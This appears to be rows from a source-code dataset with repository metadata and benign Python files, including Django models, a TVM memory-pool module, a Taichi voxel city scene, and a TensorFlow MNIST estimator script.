blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
790f67a27f41c7f4456c418cf0e03464a2005369 | e4ee9f2ca60b60ea9fa1b05c982594a2c1b10484 | /day61 课上笔记以及代码 django orm跨表查询/代码/manytable/app01/models.py | 17295b515cdc4aa9e96bd4ea8605780ea96f0da5 | [] | no_license | tianshang486/Pythonlaonanhai | 100df2cc437aad1ee1baf45bdfc4500b1302092b | 2a5b46986f5ca684b2ae350596e293db54e1e2f4 | refs/heads/master | 2022-09-19T02:16:56.972160 | 2020-06-04T09:24:30 | 2020-06-04T09:24:30 | 269,314,860 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | from django.db import models
# Create your models here.
from django.db import models
# Create your models here.
#作者表
# Author model: frequently-used author info lives here; rarely-used
# details are split out into AuthorDetail (one-to-one).
class Author(models.Model): # commonly-accessed information goes in this table
    name=models.CharField( max_length=32)
    age=models.IntegerField()
    # authorDetail=models.OneToOneField(to="AuthorDetail",to_field="nid",on_delete=models.CASCADE)
    authorDetail=models.OneToOneField(to='AuthorDetail') # one-to-one link to AuthorDetail; the generated DB column is named authorDetail_id
    # an FK field is stored as <field name>_id in the table
    # one-to-one == foreign key + unique constraint
    def __str__(self):
        return self.name
#作者详细信息表
class AuthorDetail(models.Model):
    """Rarely-accessed author details, reached one-to-one from Author."""
    birthday=models.DateField()
    # telephone=models.BigIntegerField()
    telephone=models.CharField(max_length=32) # stored as text so leading zeros / '+' prefixes survive
    addr=models.CharField( max_length=64)
    def __str__(self):
        return self.addr
#出版社表 和 书籍表 是 一对多的关系
class Publish(models.Model):
    """Publisher; one publisher has many Books (FK lives on Book.publishs)."""
    name=models.CharField( max_length=32)
    city=models.CharField( max_length=32)
    email=models.EmailField() # a CharField subclass with email validation
    def __str__(self):
        return self.name
#书籍表
class Book(models.Model):
    """Book: many-to-one with Publish, many-to-many with Author."""
    nid = models.AutoField(primary_key=True)
    title = models.CharField( max_length=32)
    publishDate=models.DateField()
    price=models.DecimalField(max_digits=5,decimal_places=2) # maps to decimal(5,2) in SQL
    publishs=models.ForeignKey(to="Publish",related_name='xx') # reverse accessor: publish.xx
    authors=models.ManyToManyField(to='Author') # Django auto-creates the junction table
    def __str__(self):
        return self.title
# class BookToAuthor(models.Model):
# book_id = models.ForeignKey(to='Book')
# author_id = models.ForeignKey(to='Author')
# # xx = models.CharField(max_length=12)
| [
"tianshang486@.com"
] | tianshang486@.com |
fd4fd9e65dc6ee6914dcc793301d1b035fea57b1 | 3da6b8a0c049a403374e787149d9523012a1f0fc | /Coder_Old/早期代码/test6.py | 73386cf5c9237f095c66d194c9e0dbf3b2a33fb8 | [] | no_license | AndersonHJB/PyCharm_Coder | d65250d943e84b523f022f65ef74b13e7c5bc348 | 32f2866f68cc3a391795247d6aba69a7156e6196 | refs/heads/master | 2022-07-25T11:43:58.057376 | 2021-08-03T02:50:01 | 2021-08-03T02:50:01 | 348,922,058 | 3 | 3 | null | 2021-09-05T02:20:10 | 2021-03-18T02:57:16 | Python | UTF-8 | Python | false | false | 363 | py | user_answer_correct = False #False
# Re-prompt until a recognised gender code ('F' or 'M') is entered.
while not user_answer_correct:
    user_gender = input("请输入你的性别(F/M):")
    if user_gender == 'F':
        print("你是萌妹子!")
        user_answer_correct = True  # valid answer -> stop looping
    elif user_gender == 'M':
        print("你是糙汉子!")
        user_answer_correct = True  # valid answer -> stop looping
    else:
        print("输入不正确,请输入'F'或'M'")  # invalid input -> ask again
| [
"1432803776@qq.com"
] | 1432803776@qq.com |
79f773c3ae16399c5f62a3cf1fb0ce58800a4bfe | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_7/gdljam001/question1.py | 82f4d81b71c8d1fa705a32a941e2345642497547 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | """Enter strings delete duplicates print
James Godlonton
29 April 2014"""
def main():
    """Read strings until the sentinel "DONE", then print the unique ones.

    Duplicates are dropped; first-seen order is preserved.
    """
    print("Enter strings (end with DONE):\n")
    words = []  # ordered unique entries (a list keeps input order)
    new_word = input("")
    while new_word != "DONE":
        # Linear membership test is fine for interactive input sizes.
        if new_word not in words:
            words.append(new_word)
        new_word = input("")
    print("Unique list:")
    for word in words:
        print(word)
if __name__=="__main__":#Running main
main() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
89407569d51f23f7788a8c25ad587b13bfa7d953 | 68a52ad1df836c9f6d922515b2f896b6928ce6a0 | /SafetyProductionSystem/systemsettings/migrations/0003_auto_20190225_1623.py | 899014ddee8e156d68343a14982871a4e35b7333 | [] | no_license | Chuazhen0/SafetyProductionSystem | 1141f845e04b032ff2a230c8def26066f061600c | 442d5df3818d43aebb9830f2456c73018aae2acf | refs/heads/master | 2020-05-20T12:47:46.365020 | 2019-05-08T09:56:01 | 2019-05-08T09:56:01 | 185,579,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 889 | py | # Generated by Django 2.0.5 on 2019-02-25 16:23
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration: adds KKs_organid to the `kks` model
    # and relaxes KKS_code / KKS_codename to accept blank/null values.

    dependencies = [
        ('systemsettings', '0002_supervisiontype_form_use'),
    ]

    operations = [
        migrations.AddField(
            model_name='kks',
            name='KKs_organid',
            field=models.CharField(blank=True, default='', max_length=30, null=True, verbose_name='KKS电厂接口id'),
        ),
        migrations.AlterField(
            model_name='kks',
            name='KKS_code',
            field=models.CharField(blank=True, default='', max_length=30, null=True, verbose_name='KKS编码'),
        ),
        migrations.AlterField(
            model_name='kks',
            name='KKS_codename',
            field=models.TextField(blank=True, default='', null=True, verbose_name='KKS编码名称'),
        ),
    ]
| [
"Caohuazhenrn@163.com"
] | Caohuazhenrn@163.com |
8e718c6efb993cb859b4413f341342e7098c2c60 | 01062df369907a6ff4367ad006d9be75f3b0886f | /zvt/recorders/eastmoney/dividend_financing/__init__.py | 49e6bf4757df6edae05a9e784d6be28b8a1da5cc | [
"MIT"
] | permissive | scanfyu/zvt | 917d8dd6df63fd3d55183896710573700f615a0e | 2ff38155bd85fb0945a7b45cad8dbdf2f175a3d5 | refs/heads/master | 2021-12-01T13:40:00.241766 | 2021-11-26T16:04:04 | 2021-11-26T16:04:04 | 186,553,012 | 0 | 0 | MIT | 2020-03-01T02:33:08 | 2019-05-14T05:46:40 | Python | UTF-8 | Python | false | false | 1,256 | py | # -*- coding: utf-8 -*-
# the __all__ is generated
__all__ = []
# __init__.py structure:
# common code of the package
# export interface in __all__ which contains __all__ of its sub modules
# import all from submodule eastmoney_dividend_detail_recorder
from .eastmoney_dividend_detail_recorder import *
from .eastmoney_dividend_detail_recorder import __all__ as _eastmoney_dividend_detail_recorder_all
__all__ += _eastmoney_dividend_detail_recorder_all
# import all from submodule eastmoney_dividend_financing_recorder
from .eastmoney_dividend_financing_recorder import *
from .eastmoney_dividend_financing_recorder import __all__ as _eastmoney_dividend_financing_recorder_all
__all__ += _eastmoney_dividend_financing_recorder_all
# import all from submodule eastmoney_rights_issue_detail_recorder
from .eastmoney_rights_issue_detail_recorder import *
from .eastmoney_rights_issue_detail_recorder import __all__ as _eastmoney_rights_issue_detail_recorder_all
__all__ += _eastmoney_rights_issue_detail_recorder_all
# import all from submodule eastmoney_spo_detail_recorder
from .eastmoney_spo_detail_recorder import *
from .eastmoney_spo_detail_recorder import __all__ as _eastmoney_spo_detail_recorder_all
__all__ += _eastmoney_spo_detail_recorder_all | [
"5533061@qq.com"
] | 5533061@qq.com |
c8495695dfc3158a39b3fd5002042159feee657f | 74b12c96a73d464e3ca3241ae83a0b6fe984b913 | /python/tvm/ir/memory_pools.py | 6fa6bb41280ee5b88cdca8431f31b4201bd621c5 | [
"Apache-2.0",
"BSD-3-Clause",
"Zlib",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"BSD-2-Clause"
] | permissive | masahi/tvm | cf765bb892655f02135e1ce3afde88698f026483 | c400f7e871214451b75f20f4879992becfe5e3a4 | refs/heads/master | 2023-08-22T20:46:25.795382 | 2022-04-13T08:47:10 | 2022-04-13T08:47:10 | 138,661,036 | 4 | 2 | Apache-2.0 | 2021-09-03T20:35:19 | 2018-06-25T23:39:51 | Python | UTF-8 | Python | false | false | 4,811 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Objects for Memory Pools to be used within the compilation"""
from typing import Optional, List
from tvm._ffi import register_object
from tvm.runtime import Object
from . import _ffi_api
@register_object("ir.PoolInfo")
class PoolInfo(Object):
"""PoolInfo object holds information related to memory pools
where the statically sized allocate nodes will pooled into.
Parameters
----------
pool_name : str
The name of the memory pool
target_access : Dict[Target, str]
A dictionary where keys describe which targets could
access the pool where value could take the values :
a) "rw" : read-write access
b) "ro" : write-only acesss
size_hint_bytes : Optional[int]
The expected size hint to be used by the allocator.
The default value would be -1 which means the pool
is not size restricted.
clock_frequency_hz : Optional[int]
The clock frequency that the memory pool runs at in Hz.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
read_bandwidth_bytes_per_cycle : Optional[int]
The read bandwidth of the memory pool in bytes/cycle.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
write_bandwidth_bytes_per_cycle : Optional[int]
The write bandwidth of the memory pool in bytes/cycle.
If not specified/known, this will default to -1 indicating
it hasn't been defined.
read_latency_cycles : Optional[int]
The read latency of the memory pool in cycles.
If not specified/known, this will default to 0.
write_latency_cycles : Optional[int]
The write latency of the memory pool in cycles.
If not specified/known, this will default to 0.
target_burst_bytes : Optional[Union[Dict[Target, int], None]]
The burst length of the memory pool in bytes per target.
If not specified/known for a given target, a burst length
of 1 byte will be assumed.
"""
# The string parameter to indicate read and write access to a pool
# This needs to be kept in sync with kTargetPoolReadWriteAccess in
# include/tvm/ir/memory_pools.h
READ_WRITE_ACCESS = "rw"
# The string parameter to indicate read only access to a pool
# This needs to be kept in sync with kTargetPoolReadOnlyAccess in
# include/tvm/ir/memory_pools.h
READ_ONLY_ACCESS = "ro"
def __init__(
self,
pool_name: str,
target_access, # Dict[Target, str]
size_hint_bytes: Optional[int] = -1,
clock_frequency_hz: Optional[int] = -1,
read_bandwidth_bytes_per_cycle: Optional[int] = -1,
write_bandwidth_bytes_per_cycle: Optional[int] = -1,
read_latency_cycles: Optional[int] = 0,
write_latency_cycles: Optional[int] = 0,
target_burst_bytes=None, # Optional[Union[Dict[target.Target, int], None]]
):
if not target_burst_bytes:
target_burst_bytes = dict()
self.__init_handle_by_constructor__(
_ffi_api.PoolInfo, # type: ignore # pylint: disable=no-member
pool_name,
target_access,
size_hint_bytes,
clock_frequency_hz,
read_bandwidth_bytes_per_cycle,
write_bandwidth_bytes_per_cycle,
read_latency_cycles,
write_latency_cycles,
target_burst_bytes,
)
@register_object("ir.WorkspaceMemoryPools")
class WorkspaceMemoryPools(Object):
"""This object contains a list of PoolInfo objects to be used as
workspace memory in the compilation
Parameters
----------
pools : List[PoolInfo]
The list of PoolInfo objects to be used with the compilation
"""
def __init__(
self,
pools: List[PoolInfo],
):
self.__init_handle_by_constructor__(
_ffi_api.WorkspaceMemoryPools, pools # type: ignore # pylint: disable=no-member
)
| [
"noreply@github.com"
] | masahi.noreply@github.com |
272841adc8391f599019c7c4e827f9a9d32e39c6 | bb5d587afdf7fb455972889b1453b48371b55c25 | /my_projects/social_project/social_profile/urls.py | 5ae5e9d4a2bf24fbbd6c72a76988e482e20487cd | [] | no_license | nilldiggonto/projects_dj3_vue3_js | e8a98019c1e5ec65724c09733054afbacfb22ead | 6ce52c29c3560a25ed36ba074fc6c2a60191ebe4 | refs/heads/main | 2023-05-30T06:00:06.558789 | 2021-05-29T10:06:02 | 2021-05-29T10:06:02 | 342,195,694 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | from django.urls import path
from .views import socialprofileView,follow_userView,unfollow_userView,followerView,followView,edit_avatarView
urlpatterns = [
path('avatar/',edit_avatarView,name='social-edit-avatar'),
path('<str:username>',socialprofileView,name='social-profile'),
path('<str:username>/follow/',follow_userView,name='social-user-profile-follow'),
path('<str:username>/unfollow/',unfollow_userView,name='social-user-profile-unfollow'),
path('<str:username>/follower/list/',followerView,name='social-follower-list'),
path('<str:username>/follows/list/',followView,name='social-follow-list'),
] | [
"nilldiggonto@gmail.com"
] | nilldiggonto@gmail.com |
668ee56d3db6869a5a34ef2f597168e88eb72fe4 | 337522cddf5931972932a870e24905567889a49f | /example7.py | e772a6cd235c28c6f95c89d68e7929327932a8dd | [] | no_license | taichi-dev/voxel-challenge | 3d7552d7029328e9c28e2665c06e1b23a15bcc30 | 94c28c8c37d6ff1547daf47becf9731be41dc2e5 | refs/heads/main | 2023-07-10T06:59:02.694455 | 2022-08-04T03:06:53 | 2022-08-04T03:06:53 | 481,891,435 | 186 | 45 | null | 2022-08-05T16:09:43 | 2022-04-15T08:29:35 | Python | UTF-8 | Python | false | false | 5,837 | py | from scene import Scene; import taichi as ti; from taichi.math import *
day = True; manual_seed = 77
scene = Scene(voxel_edges=0, exposure=2 - day)
scene.set_floor(-0.05, (1.0, 1.0, 1.0))
scene.set_background_color((0.9, 0.98, 1) if day else (0.01, 0.01, 0.02))
scene.set_directional_light((1, 1, 1), 0.1, (0.9, 0.98, 1) if day else (0.01, 0.01, 0.02))
lgrid, ngrid = 15, 8
# Deterministic pseudo-random value in [0, 1) from a 2-D seed -- the classic
# GLSL sin/dot hash, so the same (i, j) always yields the same number.
@ti.func
def rand(i, j): return fract(ti.sin(dot(vec2(i, j), vec2(12.9898, 78.233))) * 43758.5453)
# True when block (i, j) was marked as road by initialize(); road cells are
# stored as material 1 in the hidden y = -8 scratch plane.
# NOTE(review): the j bound is `<= ngrid` while i uses `< ngrid` -- looks
# asymmetric; harmless today because row ngrid is never written, but confirm.
@ti.func
def is_road(i, j):
    return 0 <= i < ngrid and 0 <= j <= ngrid and scene.get_voxel(vec3(i, -8, j))[0] == 1
@ti.kernel
def initialize():
    # Clear the hidden y = -8 plane that serves as the coarse road map.
    for i, j in ti.ndrange(8, 8): scene.set_voxel(ivec3(i, -8, j), 0, vec3(0))
    # Random start/end cells strictly inside the ngrid x ngrid block grid.
    start, end = 1+int(vec2(ti.random(),ti.random())*(ngrid-2)), 1+int(vec2(ti.random(),ti.random())*(ngrid-2))
    turn = start + 1
    # Re-roll the turning cell until it is not adjacent to start or end.
    while any((abs(turn-start)==1)|(abs(turn-end)==1)): turn = 1+int(vec2(ti.random(),ti.random())*(ngrid-2))
    # Carve two roads (k=0 and k=1, one per axis), each stepping across the
    # grid and changing direction when it reaches the turn / end columns.
    for k in ti.static([0, 1]):
        d = vec2(k, 1-k); p = start[k]*vec2(1-k, k)-d
        while p[1-k] < ngrid - 1:
            p += d; scene.set_voxel(ivec3(p.x, -8, p.y), 1, vec3(0.5))
            if p[1-k] == turn[1-k]: d = (1 if start[k] < end[k] else -1) * vec2(1-k, k)
            if p[k] == end[k]: d = vec2(k, 1-k)
@ti.func
def build_road(X, uv, d):
    # Lay road voxels at world column X; uv is the in-block (0..14) coord and
    # d is a 0/1 vec4 of road-neighbour flags: (j+1, i+1, j-1, i-1) blocks.
    if d.sum() <= 2:
        # Straight segment: align uv with the road axis if it runs the other way.
        if ((d.x | d.z) ^ (d.y | d.w)) & 1: uv = vec2(uv.y, uv.x) if (d.y | d.w) & 1 else uv
        else: # curve
            # Rotate until the two connected sides sit on the z/w slots, then
            # switch to polar coordinates so the lane markings follow the bend.
            while d.z == 0 or d.w == 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x)
            uv = vec2(uv.norm(), ti.atan2(uv.x, uv.y)*2/pi*lgrid)
    elif d.sum() >= 3: # junction
        while d.sum() == 3 and d.y != 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x) # rotate T-junction
        if d.sum() > 3 or uv.x <= 7:
            # Mirror into one quadrant, then polar-map as for a curve.
            uv = vec2(mix(14-uv.x, uv.x, uv.x <= 7), mix(14-uv.y, uv.y, uv.y <= 7))
            uv = vec2(uv.norm(), ti.atan2(uv.x, uv.y)*2/pi*lgrid)
    scene.set_voxel(vec3(X.x, 0, X.y), 1, vec3(1 if uv.x==7 and 4<uv.y<12 else 0.5)) # pavement
    if uv.x <= 1 or uv.x >= 13: scene.set_voxel(ivec3(X.x, 1, X.y), 1, vec3(0.7, 0.65, 0.6)) # sidewalk
    if uv.y == 7 and (uv.x == 1 or uv.x == 13): # lights
        for i in range(2, 9): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.6, 0.6, 0.6))
    if uv.y == 7 and (1<=uv.x<=2 or 12<=uv.x<=13): scene.set_voxel(vec3(X.x, 8, X.y), 1, vec3(0.6, 0.6, 0.6))
    if uv.y == 7 and (uv.x == 2 or uv.x == 12): scene.set_voxel(vec3(X.x, 7, X.y), 2, vec3(1, 1, 0.6))
@ti.func
def build_building(X, uv, d, r):
    # Erect a tower on this block. r in [0, 1) seeds all per-building
    # randomness (height, palette, style); d marks adjacent road blocks.
    while d.sum() > 0 and d.z == 0: d = d.yzwx; uv=vec2(14-uv.y, uv.x) # rotate
    fl = int(3 + 10 * r); style = rand(r, 5)  # fl = number of floors
    wall = vec3(rand(r, 1),rand(r, 2),rand(r, 2)) * 0.2+0.4
    wall2 = mix(vec3(rand(r, 9)*0.2+0.2), wall, style > 0.5 and rand(r, 4) < 0.4)
    maxdist = max(abs(uv.x - 7), abs(uv.y - 7))  # Chebyshev distance from block centre
    for i in range(2, fl * 4):
        # Windows lit at random, two voxel-rows per floor (i%4<2).
        light = mix(vec3(0.25,0.35,0.38), vec3(0.7,0.7,0.6), rand(rand(X.x, X.y), i//2)>0.6)
        if maxdist < 6:
            scene.set_voxel(vec3(X.x, i, X.y), mix(1, 0, i%4<2), mix(wall2, light, i%4<2))
            if (uv.x == 2 or uv.x == 12) and (uv.y == 2 or uv.y == 12) or style>0.5 and (uv.x%3==1 or uv.y%3==1):
                scene.set_voxel(vec3(X.x, i, X.y), 1, wall)  # corner pillars / mullions
        if maxdist < 5: scene.set_voxel(vec3(X.x, i, X.y), mix(1, 2, i%4<2), mix(wall, light, i%4<2))
    if maxdist == 5:
        for i in range(fl*4, fl*4+2): scene.set_voxel(vec3(X.x, i, X.y), 1, wall) # roof
    if maxdist < 5: scene.set_voxel(vec3(X.x, fl*4, X.y), 1, vec3(rand(r, 7)*0.2+0.4))
    for i in range(2): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.7, 0.65, 0.6)) # sidewalk
    if fl > 10 and uv.x == 6 and uv.y == 6: # antenna
        for i in range(fl+1):
            scene.set_voxel(vec3(X.x, fl*5-i, X.y), mix(1, 2, i==0), mix(vec3(0.6), vec3(0.8,0,0), i==0))
    if d.sum() > 0 and uv.y == 2 and 4 < uv.x < 10: # billboard
        for i in range(5, 7):
            scene.set_voxel(vec3(X.x,i,X.y), 2, vec3(int(r*3)==0,int(r*3)==1,int(r*3)==2)*(0.2+ti.random()*0.3))
        for i in range(2, 5): scene.set_voxel(vec3(X.x,i,X.y), 0, vec3(0))
    if d.sum() > 0 and uv.y == 3 and 4 < uv.x < 10:
        for i in range(2, 5): scene.set_voxel(vec3(X.x,i,X.y), 1, vec3(0.7,0.7,0.6))
    if max(abs(uv.x - rand(r, 8)*7-4), abs(uv.y - rand(r, 10)*7-4)) < 1.5: # HVAC
        for i in range(fl*4+1, fl*4+3): scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.6))
@ti.func
def build_park(X, uv, d, r):
    # Fill the block with undulating grass, one tree and a lamp; r seeds the
    # per-park randomness so every cell of the block agrees on the layout.
    center, height = int(vec2(rand(r, 1) * 7 + 4, rand(r, 2) * 7 + 4)), 9 + int(rand(r, 3)) * 5
    for i in range(height + 3): # tree
        if (uv - center).norm() < 1:
            scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.36, 0.18, 0.06))  # trunk
        if i > min(height-4, (height+5)//2) and (uv - center).norm() < (height+3-i) * (rand(r, 4)*0.6 + 0.4):
            scene.set_voxel(vec3(X.x, i, X.y), ti.random()<0.8, vec3(0.1, 0.3 + ti.random()*0.2, 0.1))  # foliage cone
    # Grass height follows a gentle sine swell plus sparse one-voxel tufts.
    h = 2 * ti.sin((uv.x**2+uv.y**2+rand(r, 0)**2*256)/1024 * 2*pi) + 2 + (ti.random() > 0.95)
    for i in range(int(h)): # grass
        scene.set_voxel(vec3(X.x, i, X.y), 1, vec3(0.2, 0.5 + ti.random() * 0.2, 0.05))
    if max(abs(uv.x - rand(r, 4)*7-4), abs(uv.y - rand(r, 5)*7-4)) < 0.5: # light
        for i in range(3):
            scene.set_voxel(vec3(X.x, h+i, X.y), 1+(i==1), mix(vec3(0.2),vec3(0.9,0.8,0.6),vec3(i==1)))
@ti.kernel
def draw():
    # For every ground cell: find its 15x15 block, look up the block's road
    # neighbourhood, then place road, tower or park geometry accordingly.
    for X in ti.grouped(ti.ndrange((-60, 60), (-60, 60))):
        I, uv = (X+60) // lgrid, float((X + 60) % lgrid)  # block index / in-block coords
        d = int(vec4(is_road(I.x,I.y+1),is_road(I.x+1,I.y),is_road(I.x,I.y-1),is_road(I.x-1,I.y)))
        r = mix(rand(I.x, I.y), any(d>0), 0.4)  # bias road-adjacent blocks toward buildings
        if is_road(I.x, I.y): build_road(X, uv, d)
        elif r > 0.5: build_building(X, uv, d, 2*r-1)
        else: build_park(X, uv, d, 2*r)
[initialize() for _ in range(manual_seed + 1)]; draw(); scene.finish()
| [
"noreply@github.com"
] | taichi-dev.noreply@github.com |
e15565680e10de69563972677f3682cd3d1140ce | aff608f59d1c9ecee2ebca0ac63e0e1775502858 | /sitegeist/cache.py | 0244a7db751c7415809f9af64171871519dea17c | [] | permissive | parthkhatri1998/sitegeist | 45a5010dad09fabd98be59a9fd0dc18289749ba7 | 231b18dfb3a5a0fce32c1c5e01227dcf9bb18010 | refs/heads/master | 2022-12-23T01:37:37.721753 | 2020-09-30T16:26:15 | 2020-09-30T16:26:15 | 299,981,485 | 0 | 0 | BSD-3-Clause | 2020-09-30T16:25:45 | 2020-09-30T16:25:45 | null | UTF-8 | Python | false | false | 1,509 | py | import datetime
import logging
from django.conf import settings
from sitegeist.mongo import db
logger = logging.getLogger(__name__)
class CoordinateCache(object):
    """MongoDB-backed cache keyed by geographic coordinate.

    Lookups snap to any cached entry within ``snap_radius`` of the requested
    point, so nearby coordinates can share one cached payload.
    """

    def __init__(self, namespace, snap_radius=None):
        # namespace partitions cache entries between different consumers.
        self.namespace = namespace
        # Fall back to the site-wide snap radius when none is supplied.
        self.snap_radius = snap_radius or settings.SITEGEIST['GEO_SNAP_RADIUS']

    def get(self, latlon):
        """Return cached data near *latlon*, or None on a miss or expiry."""
        # The whole coordinate cache can be disabled via settings.
        if not settings.SITEGEIST.get('COORDCACHE', False):
            return
        latlon = [float(p) for p in latlon]
        # $near + $maxDistance: any entry within snap_radius is a hit.
        spec = {
            "namespace": self.namespace,
            "geo": {
                "$maxDistance": self.snap_radius,
                "$near": latlon
            }
        }
        doc = db.coordcache.find_one(spec)
        if doc:
            now = datetime.datetime.utcnow()
            # COORDCACHE_EXPIRATION is expressed in minutes.
            expsecs = settings.SITEGEIST['COORDCACHE_EXPIRATION'] * 60
            exptime = doc['timestamp'] + datetime.timedelta(seconds=expsecs)
            logger.debug("Comparing cache expiration %s to now %s" % (exptime, now))
            if exptime > now:
                logger.debug("Cache is valid")
                return doc['data']
            else:
                # Expired: evict eagerly so later lookups do not match it.
                logger.debug("Cache is invalid, deleting document")
                db.coordcache.remove(doc["_id"])

    def set(self, latlon, data):
        """Store *data* for *latlon*, timestamped for later expiry checks."""
        doc = {
            'geo': latlon,
            'namespace': self.namespace,
            'data': data,
            'timestamp': datetime.datetime.utcnow(),
        }
        db.coordcache.insert(doc)
| [
"jcarbaugh@gmail.com"
] | jcarbaugh@gmail.com |
dc14a031d4b4835a5f528eaa2f8bc1d6d6d739ac | dd027c4bbcace97e3dbf566c123b178ceb1a8282 | /sett/jenkins.py | e001b1bf4d4e59dbd5a8ad9a75c21044fbe740be | [] | no_license | cecedille1/Sett | 479bf00ca8df807f431e235c68b892bb90fab9b0 | bf8b9f204caa532a5fb8f110ab4e4a1cea03cb96 | refs/heads/master | 2021-01-10T13:28:11.614022 | 2016-03-31T16:51:14 | 2016-03-31T16:51:14 | 43,488,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from paver.easy import task, call_task
@task
def jenkins():
    """Runs the Jenkins tasks"""
    # Generate nosetest.xml
    # Generate coverage.xml
    # Generate flake8.log
    try:
        call_task('quality', options={
            'output': 'flake8.log',
            'strictness': 2,
        })
    except SystemExit:
        # Remember the quality failure but keep going so the coverage
        # artifacts are still produced for Jenkins to archive.
        quality_ok = False
    else:
        quality_ok = True
    call_task('coverage', options={
        'xunit': 'nosetests.xml',
        'xcoverage': 'coverage.xml',
    })
    # Fail the build only after every artifact has been generated.
    if not quality_ok:
        raise SystemExit(1)
| [
"gr@enix.org"
] | gr@enix.org |
f6a4e829c58c1e15e58c94bdee01590ada2c674c | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_228/ch167_2020_06_22_18_23_48_389416.py | 3422198732d84d06c9a9ad4b22dcf97ec1c7fdeb | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | def bairro_mais_custoso(empresa):
semestral={}
for bairro in empresa:
semestral[bairro]=0
for gasto in empresa[bairro][6:]:
semestral[bairro]+=gasto
maiorcusto=0
nome=""
for bairro,custo in semestral.items():
if custo>maiorcusto:
maiorcusto=custo
nome=bairro
return nome
| [
"you@example.com"
] | you@example.com |
3ade7e133fc24950c2902b71a88de65edfd42d9e | 1ba8d8ae275524a2ac61226dca4a21972cf6c355 | /Deep_Learning_with_TensorFlow/1.4.0/Chapter10/8. Estimator-DNNClassifier.py | 0355ab5fda86fa6dc0e3bc53a476c1c09fb64d08 | [
"MIT"
] | permissive | hyphenliu/TensorFlow_Google_Practice | 4e2da546f6056ddbbda26a2d9855cc96c2e3a708 | 0ea7d52a4056e5e53391a452a9bbd468175af7f5 | refs/heads/master | 2020-09-28T17:13:05.032238 | 2018-07-18T08:07:34 | 2018-07-18T08:07:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,444 | py |
# coding: utf-8
# ### 1. 模型定义。
# In[1]:
import numpy as np
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# --- 1. Model definition -------------------------------------------------
tf.logging.set_verbosity(tf.logging.INFO)
mnist = input_data.read_data_sets("../../datasets/MNIST_data", one_hot=False)

# Model input: one 784-dim numeric feature per flattened 28x28 image.
feature_columns = [tf.feature_column.numeric_column("image", shape=[784])]

# Single hidden layer (500 units) DNN classifier over the 10 digit classes.
estimator = tf.estimator.DNNClassifier(feature_columns=feature_columns,
                                       hidden_units=[500],
                                       n_classes=10,
                                       optimizer=tf.train.AdamOptimizer(),
                                       model_dir="log")

# --- 2. Training ---------------------------------------------------------
train_input_fn = tf.estimator.inputs.numpy_input_fn(
    x={"image": mnist.train.images},
    y=mnist.train.labels.astype(np.int32),
    num_epochs=None,
    batch_size=128,
    shuffle=True)
estimator.train(input_fn=train_input_fn, steps=10000)

# --- 3. Evaluation -------------------------------------------------------
test_input_fn = tf.estimator.inputs.numpy_input_fn(
    x={"image": mnist.test.images},
    y=mnist.test.labels.astype(np.int32),
    num_epochs=1,
    batch_size=128,
    shuffle=False)
